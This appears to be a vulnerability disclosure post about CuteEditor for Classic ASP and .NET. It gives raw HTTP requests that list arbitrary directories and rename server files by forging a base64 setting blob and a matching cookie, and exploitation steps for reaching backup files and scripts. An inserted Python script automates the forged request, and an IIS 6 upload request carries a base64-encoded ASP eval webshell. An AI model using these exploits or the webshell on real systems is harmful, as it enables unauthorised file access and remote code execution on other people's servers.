
CuteEditor for Classic ASP vulnerabilities

I stumbled across these CuteEditor for Classic ASP vulnerabilities by accident. The editor is not widely used, so I might as well just publish them.

Listing arbitrary directories and files:

GET /aspedit/cuteeditor_files/Dialogs/browse_Img.asp?setting=[base64 setting string]%3d&MP=/&Theme=Office2003 HTTP/1.1
Host: 192.168.223.250:8889
Cookie: CESecurity=[base64 setting string]%3d;

Base64-decode the setting parameter from the query string and you can append further file extensions to the list of files to be shown. The CESecurity cookie must carry exactly the same value as the setting parameter, and every cookie whose name begins with ASPSESSIONID must be removed, otherwise the session check fails.
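The procedure above (decode the setting blob, append extensions, keep CESecurity identical to setting, drop the ASPSESSIONID cookies) as an added Python example; this is not code from the original post or from CuteSoft. It uses the base64 setting value shown in the rename request further down this page. The reading of that blob as a '|'-separated field list, and the choice of field 14 (".jpg,.jpeg,.gif,.png,") as the extension list that browse_Img.asp consults, are assumptions drawn from the decoded contents; the host and cookie values in the usage section are constructed.

```python
"""Rewrite the CuteEditor 'setting' blob and build the listing request.

Added example, not code from the page or from CuteSoft. The field meanings
are inferred from the decoded contents (an assumption), as is the choice of
field 14 as the image-extension list used by browse_Img.asp.
"""
import base64
from urllib.parse import quote

# Setting value copied verbatim from the rename request on this page.
SETTING_B64 = "MTAwMHwxMDAwMDB8MTAwMHwxMDAwfDEwMDB8L3VwbG9hZHN8L3VwbG9hZHN8L3VwbG9hZHN8L3RlbXBsYXRlc3wvdXBsb2Fkc3x0cnVlfHRydWV8dHJ1ZXx0cnVlfC5qcGcsLmpwZWcsLmdpZiwucG5nLHwuYXZpLC5tcGcsLm1wZWcsLm1wMywud212LC53YXYsfC50eHQsLmRvYywuZG9jeCwucGRmLC56aXAsLnJhciwuYXZpLC5tcGcsLm1wZWcsLm1wMywud2F2LC5zd2YsLmpwZywuanBlZywuZ2lmLC5wbmcsLmh0bSwueGxzLC5odG1sLC5ydGYsLndtdix8LnR4dCwucnRmLC5odG1sLC5odG0sLnhtbCx8ZW4tZW58ZmFsc2U="

# Index of the field that decodes to ".jpg,.jpeg,.gif,.png," (assumed to be
# the image-extension list the image browser dialog reads).
IMAGE_EXT_FIELD = 14


def decode_setting(b64: str) -> list[str]:
    """Base64-decode the blob and split it into its '|'-separated fields."""
    return base64.b64decode(b64).decode("utf-8").split("|")


def encode_setting(fields: list[str]) -> str:
    """Inverse of decode_setting: re-join the fields and base64-encode them."""
    return base64.b64encode("|".join(fields).encode("utf-8")).decode("ascii")


def add_extensions(b64: str, new_exts: list[str], field: int = IMAGE_EXT_FIELD) -> str:
    """Return a new blob with new_exts appended to one extension-list field.

    The lists in the page's blob end with a trailing comma, so that shape is
    kept; extensions already present are not duplicated.
    """
    fields = decode_setting(b64)
    exts = [e for e in fields[field].split(",") if e]
    for ext in new_exts:
        if ext not in exts:
            exts.append(ext)
    fields[field] = ",".join(exts) + ","
    return encode_setting(fields)


def strip_session_cookies(cookie_header: str) -> str:
    """Drop every cookie whose name starts with ASPSESSIONID, keep the rest."""
    kept = []
    for part in cookie_header.split(";"):
        part = part.strip()
        if part and not part.startswith("ASPSESSIONID"):
            kept.append(part)
    return "; ".join(kept)


def build_list_request(host: str, setting_b64: str, mp: str = "/",
                       existing_cookies: str = "") -> str:
    """Build the raw GET for browse_Img.asp with setting and CESecurity in sync."""
    enc = quote(setting_b64, safe="")  # '=' becomes %3D, as on the page
    path = ("/aspedit/cuteeditor_files/Dialogs/browse_Img.asp"
            f"?setting={enc}&MP={quote(mp, safe='/')}&Theme=Office2003")
    others = strip_session_cookies(existing_cookies)
    cookie = f"CESecurity={enc}" + (f"; {others}" if others else "")
    return f"GET {path} HTTP/1.1\r\nHost: {host}\r\nCookie: {cookie}\r\n\r\n"


if __name__ == "__main__":
    # Constructed usage: widen the image list so script and archive files show up
    # in the directory listing, then emit a request with the session cookie gone.
    widened = add_extensions(SETTING_B64, [".asp", ".bak", ".zip"])
    print(decode_setting(widened)[IMAGE_EXT_FIELD])
    print(build_list_request("192.168.223.250:8889", widened, "/",
                             "ASPSESSIONIDASSRTAQC=MBLPJBJAGFPDNAAJNFENOELH"))
```

Because the server only compares the cookie against the query string, any blob you can encode is accepted; the decoded field list also shows the configured upload and template paths, which is useful when choosing MP for the listing.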

Arbitrary file rename:

GET /aspedit/cuteeditor_files/Dialogs/browse_Img.asp?setting=MTAwMHwxMDAwMDB8MTAwMHwxMDAwfDEwMDB8L3VwbG9hZHN8L3VwbG9hZHN8L3VwbG9hZHN8L3RlbXBsYXRlc3wvdXBsb2Fkc3x0cnVlfHRydWV8dHJ1ZXx0cnVlfC5qcGcsLmpwZWcsLmdpZiwucG5nLHwuYXZpLC5tcGcsLm1wZWcsLm1wMywud212LC53YXYsfC50eHQsLmRvYywuZG9jeCwucGRmLC56aXAsLnJhciwuYXZpLC5tcGcsLm1wZWcsLm1wMywud2F2LC5zd2YsLmpwZywuanBlZywuZ2lmLC5wbmcsLmh0bSwueGxzLC5odG1sLC5ydGYsLndtdix8LnR4dCwucnRmLC5odG1sLC5odG0sLnhtbCx8ZW4tZW58ZmFsc2U=&MP=/uploads/&Theme=Office2003&loc=&action=renamefile&filename=/1.aspx&newname=/1.aspx.txt HTTP/1.1
Host: 192.168.223.250:8889
Cookie: CESecurity=MTAwMHwxMDAwMDB8MTAwMHwxMDAwfDEwMDB8L3VwbG9hZHN8L3VwbG9hZHN8L3VwbG9hZHN8L3RlbXBsYXRlc3wvdXBsb2Fkc3x0cnVlfHRydWV8dHJ1ZXx0cnVlfC5qcGcsLmpwZWcsLmdpZiwucG5nLHwuYXZpLC5tcGcsLm1wZWcsLm1wMywud212LC53YXYsfC50eHQsLmRvYywuZG9jeCwucGRmLC56aXAsLnJhciwuYXZpLC5tcGcsLm1wZWcsLm1wMywud2F2LC5zd2YsLmpwZywuanBlZywuZ2lmLC5wbmcsLmh0bSwueGxzLC5odG1sLC5ydGYsLndtdix8LnR4dCwucnRmLC5odG1sLC5odG0sLnhtbCx8ZW4tZW58ZmFsc2U%3D; ASPSESSIONIDASSRTAQC=MBLPJBJAGFPDNAAJNFENOELH

Exploitation:

1. Upload a .jpg and then rename it.
2. When the upload directory has no script execute permission, or in other situations, list directories to hunt for backup files and similar information, or rename other scripts so they can be downloaded and analysed.


A CuteEditor for .NET bug under IIS 6, kept here as a backup copy:

POST /CuteSoft_Client/CuteEditor/uploader.ashx?_Addon=xhttp&_AddonGuid=e7d8104a-0ba6-4b47-8285-59d442e2b7d3&_PartialStart=0&_PartialFileName=1.asp; HTTP/1.1
Host: XXXXXX
Content-Length: 28

PCVldmFsIHJlcXVlc3QoImEiKSU+

The request body is the base64-encoded one-line webshell. _AddonGuid must not collide with a file already present on the server; the upload is saved as ~/UploaderTemp/uploading.GUID.<uploaded filename>.resx. The trailing ";" in _PartialFileName=1.asp; is what makes this an IIS 6 issue: IIS 6 stops parsing the file name at the semicolon and hands the file to the ASP handler regardless of the .resx suffix that follows.